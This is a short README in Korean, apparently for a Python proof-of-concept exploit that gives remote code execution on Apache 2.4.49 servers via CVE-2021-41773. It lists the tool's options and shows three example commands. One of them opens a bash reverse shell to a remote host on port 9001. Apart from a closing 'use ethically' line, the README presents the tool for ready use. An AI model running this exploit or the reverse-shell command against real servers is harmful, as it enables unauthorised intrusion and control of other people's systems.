
사용자 지정 명령 및 포트 옵션으로 Apache 2.4.49 서버에서 원격 코드 실행을 가능하게 하는 CVE-2021-41773용 Python 기반 개념 증명 익스플로잇.
CVE-2021-41773에 대한 PoC입니다. 너무 복잡한 익스플로잇들을 발견해서 이 PoC는 바로 원격 코드 실행으로 직행합니다.
취약한 Apache 2.4.49 서버가 실행 중인 IP 주소를 -i로 지정하고 원하는 시스템 명령어를 -c로 지정하면 됩니다. 웹 서버가 포트 80에서 실행 중이지 않으면 -p로 지정할 수 있으며, 웹 서버가 HTTPs를 사용하는 경우 --use-https 플래그를 사용해야 합니다.
$ python3 CVE-2021-41773.py -i 10.10.10.10 -c 'id'
$ python3 CVE-2021-41773.py -i example.com -p 8080 -c '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
$ python3 CVE-2021-41773.py -i 20.20.20.20 -p 443 --use-https -c 'whoami'
본인의 책임 하에 사용하세요 (:
윤리적으로 사용하세요.